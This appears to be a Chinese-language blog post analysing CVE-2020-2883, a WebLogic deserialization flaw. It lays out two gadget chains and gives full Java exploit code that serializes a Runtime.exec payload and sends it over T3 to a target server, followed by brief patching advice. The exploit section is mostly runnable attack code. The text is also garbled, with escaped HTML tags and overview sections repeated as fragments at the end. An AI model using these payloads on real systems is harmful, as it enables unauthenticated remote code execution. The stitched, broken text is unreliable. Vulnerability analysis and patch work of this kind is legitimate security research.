CVE-2020-2883: WebLogic反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2>
CVE-2020-2883是Oracle WebLogic Server中的一个严重反序列化漏洞，CVSS评分为9.8。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功利用可导致远程代码执行(RCE)。<\/p>

影响版本<\/h2>

Oracle WebLogic Server 10.3.6.0.0<\/li>
Oracle WebLogic Server 12.1.3.0.0<\/li>
Oracle WebLogic Server 12.2.1.3.0<\/li>

Oracle WebLogic Server 12.2.1.4.0<\/li> <\/ul>

技术背景<\/h2>
此漏洞是对CVE-2020-2555的绕过。Oracle在CVE-2020-2555补丁中移除了LimitFilter类的toString()方法中的extract()方法调用，但攻击者仍可通过其他途径触发反序列化漏洞。<\/p>

漏洞分析<\/h2>

补丁绕过机制<\/h3>

原始漏洞利用链中的关键环节是：<\/p>

BadAttributeValueExpException.readObject()
   com.tangosol.util.filter.LimitFilter.toString()  \/\/ 补丁移除了这一环
     com.tangosol.util.extractor.ChainedExtractor.extract()
         com.tangosol.util.extractor.ReflectionExtractor().extract()
             Method.invoke()
             \/\/...
         com.tangosol.util.extractor.ReflectionExtractor().extract()
             Method.invoke()
                 Runtime.exec()
<\/code><\/pre>
补丁后，攻击者发现两种新的利用方式：<\/p>


通过ExtractorComparator和AbstractExtractor类<\/strong>：设置ChainedExtractor为this.m_extractor的实例来调用ChainedExtractor.extract()<\/p>
<\/li>

通过MultiExtractor类<\/strong>：通过反射设置m_aExtrator为ChainedExtractor来调用ChainedExtractor.extractor<\/p>
<\/li>
<\/ol>
利用链构造<\/h3>
第一条利用链(Gadget 1)<\/h4>
ObjectInputStream.readObject()
    PriorityQueue.readObject()
        PriorityQueue.heapify()
            PriorityQueue.siftDown()
                siftDownUsingComparator()
                    com.tangosol.util.comparator.ExtractorComparator.compare()
                        com.tangosol.util.extractor.ChainedExtractor.extract()
                            com.tangosol.util.extractor.ReflectionExtractor().extract()
                                Method.invoke()
                                .......
                            com.tangosol.util.extractor.ReflectionExtractor().extract()
                                Method.invoke()
                                Runtime.exec()
<\/code><\/pre>
第二条利用链(Gadget 2)<\/h4>
ObjectInputStream.readObject()
    PriorityQueue.readObject()
        PriorityQueue.heapify()
            PriorityQueue.siftDown()
                siftDownUsingComparator()
                    com.tangosol.util.extractor.AbstractExtractor.compare()
                      com.tangosol.util.extractor.MultiExtractor.extract()
                        com.tangosol.util.extractor.ChainedExtractor.extract()
                            com.tangosol.util.extractor.ChainedExtractor.extract()
                                com.tangosol.util.extractor.ReflectionExtractor().extract()
                                    Method.invoke()
                                    .......
                                com.tangosol.util.extractor.ReflectionExtractor().extract()
                                    Method.invoke()
                                    Runtime.exec()
<\/code><\/pre>
漏洞利用<\/h2>
EXP1构造方法<\/h3>

创建valueExtractors数组，包含精心构造的ReflectionExtractor和ConstantExtractor对象<\/li>
将valueExtractors封装到ChainedExtractor对象中<\/li>
新建ExtractorComparator对象并通过反射设置其m_extractor属性<\/li>
创建PriorityQueue对象并设置自定义比较器<\/li>
序列化生成payload并通过T3协议发送<\/li>
<\/ol>
ValueExtractor[]<\/span> valueExtractors =<\/span> new<\/span> ValueExtractor[]{<\/span>
<\/span><\/span>        new<\/span> ConstantExtractor(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>        new<\/span> ReflectionExtractor(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>        new<\/span> ReflectionExtractor(<\/span>"invoke"<\/span>,<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>        new<\/span> ReflectionExtractor(<\/span>"exec"<\/span>,<\/span> new<\/span> Object[]{<\/span>new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> "calc"<\/span>}})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>ChainedExtractor chainedExtractor =<\/span> new<\/span> ChainedExtractor(<\/span>valueExtractors);<\/span>
<\/span><\/span>
<\/span><\/span>ExtractorComparator extractorComparator =<\/span> new<\/span> ExtractorComparator<<\/span>Object>();<\/span>
<\/span><\/span>Field m_extractor =<\/span> extractorComparator.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"m_extractor"<\/span>);<\/span>
<\/span><\/span>m_extractor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>m_extractor.<\/span>set<\/span>(<\/span>extractorComparator,<\/span> chainedExtractor);<\/span>
<\/span><\/span>
<\/span><\/span>PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue();<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>"foo"<\/span>);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>"bar"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Field comparator =<\/span> priorityQueue.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"comparator"<\/span>);<\/span>
<\/span><\/span>comparator.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>comparator.<\/span>set<\/span>(<\/span>priorityQueue,<\/span> extractorComparator);<\/span>
<\/span><\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> Serializables.<\/span>serialize<\/span>(<\/span>priorityQueue);<\/span>
<\/span><\/span>T3ProtocolOperation.<\/span>send<\/span>(<\/span>"target_ip"<\/span>,<\/span> "7001"<\/span>,<\/span> payload);<\/span>
<\/span><\/span><\/code><\/pre>EXP2构造方法<\/h3>

创建valueExtractors数组<\/li>
封装到ChainedExtractor对象中<\/li>
创建MultiExtractor对象并通过反射设置其父类的m_aExtractor属性<\/li>
创建PriorityQueue对象并设置自定义比较器<\/li>
序列化生成payload并通过T3协议发送<\/li>
<\/ol>
ValueExtractor[]<\/span> valueExtractors =<\/span> new<\/span> ValueExtractor[]{<\/span>
<\/span><\/span>        new<\/span> ConstantExtractor(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>        new<\/span> ReflectionExtractor(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>        new<\/span> ReflectionExtractor(<\/span>"invoke"<\/span>,<\/span> new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>        new<\/span> ReflectionExtractor(<\/span>"exec"<\/span>,<\/span> new<\/span> Object[]{<\/span>new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> "calc"<\/span>}})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedExtractor chainedExtractor =<\/span> new<\/span> ChainedExtractor<>(<\/span>valueExtractors);<\/span>
<\/span><\/span>MultiExtractor multiExtractor =<\/span> new<\/span> MultiExtractor();<\/span>
<\/span><\/span>
<\/span><\/span>Field m_extractor =<\/span> multiExtractor.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"m_aExtractor"<\/span>);<\/span>
<\/span><\/span>m_extractor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>m_extractor.<\/span>set<\/span>(<\/span>multiExtractor,<\/span> new<\/span> ValueExtractor[]{<\/span>chainedExtractor});<\/span>
<\/span><\/span>
<\/span><\/span>PriorityQueue priorityQueue =<\/span> new<\/span> PriorityQueue();<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>"foo"<\/span>);<\/span>
<\/span><\/span>priorityQueue.<\/span>add<\/span>(<\/span>"bar"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Field comparator =<\/span> priorityQueue.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"comparator"<\/span>);<\/span>
<\/span><\/span>comparator.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>comparator.<\/span>set<\/span>(<\/span>priorityQueue,<\/span>multiExtractor);<\/span>
<\/span><\/span>
<\/span><\/span>byte<\/span>[]<\/span> payload =<\/span> Serializables.<\/span>serialize<\/span>(<\/span>priorityQueue);<\/span>
<\/span><\/span>T3ProtocolOperation.<\/span>send<\/span>(<\/span>"target_ip"<\/span>,<\/span> "7001"<\/span>,<\/span> payload);<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>


官方补丁<\/strong>：立即应用Oracle官方发布的关键补丁更新(CPU)<\/p>

补丁链接：https:\/\/www.oracle.com\/security-alerts\/cpujan2020.html<\/li>
<\/ul>
<\/li>

临时缓解措施<\/strong>：<\/p>

限制T3协议的网络访问<\/li>
禁用不必要的T3协议服务<\/li>
<\/ul>
<\/li>

长期防护<\/strong>：<\/p>

定期更新WebLogic Server<\/li>
实施网络隔离策略<\/li>
监控异常T3协议流量<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

Oracle安全公告：https:\/\/www.oracle.com\/security-alerts\/cpujan2020.html<\/li>
ZDI分析报告：https:\/\/www.thezdi.com\/blog\/2020\/5\/8\/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild<\/li>
漏洞利用代码：https:\/\/github.com\/Al1ex\/CVE-2020-2883<\/li>
<\/ol>
总结<\/h2>
CVE-2020-2883是一个高危的WebLogic反序列化漏洞，攻击者可以通过T3协议远程执行任意代码。本文详细分析了漏洞原理，提供了两种利用方式的具体实现，并给出了防御建议。管理员应立即采取行动修补此漏洞，以防止潜在的攻击。<\/p>

CVE-2020-2883: WebLogic反序列化漏洞分析与利用<\/h1>

漏洞概述<\/h2> CVE-2020-2883是Oracle WebLogic Server中的一个严重反序列化漏洞，CVSS评分为9.8。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功利用可导致远程代码执行(RCE)。<\/p>

技术背景<\/h2> 此漏洞是对CVE-2020-2555的绕过。Oracle在CVE-2020-2555补丁中移除了LimitFilter类的toString()方法中的extract()方法调用，但攻击者仍可通过其他途径触发反序列化漏洞。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

漏洞概述<\/h2>
CVE-2020-2883是Oracle WebLogic Server中的一个严重反序列化漏洞，CVSS评分为9.8。该漏洞允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的WebLogic Server，成功利用可导致远程代码执行(RCE)。<\/p>

技术背景<\/h2>
此漏洞是对CVE-2020-2555的绕过。Oracle在CVE-2020-2555补丁中移除了LimitFilter类的toString()方法中的extract()方法调用，但攻击者仍可通过其他途径触发反序列化漏洞。<\/p>